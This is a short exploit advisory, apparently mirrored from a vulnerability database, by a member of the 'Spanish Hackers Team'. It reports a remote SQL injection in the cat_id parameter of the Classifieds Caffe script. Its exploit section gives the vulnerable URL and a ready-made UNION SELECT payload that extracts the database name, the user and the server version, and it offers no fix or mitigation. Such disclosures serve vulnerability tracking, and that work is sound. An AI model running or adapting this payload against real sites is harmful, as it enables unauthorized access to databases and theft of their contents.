Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19685
HistoryApr 17, 2008 - 12:00 a.m.

Classifieds Caffe (index.php cat_id) Remote SQL Injection

2008-04-1700:00:00
vulners.com
13

–==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==–
–==+ Classifieds Caffe (index.php cat_id) Remote SQL Injection +==–
–==+====================================================================================+==–
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Classifieds Caffe
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com

[+] Exploit:

[~] /index.php?action=add&cat_id=[SQL]
[~] 7'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(58),version()),char),3/*

–==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==–
–==+ JosS +==–
–==+====================================================================================+==–
[+] [The End]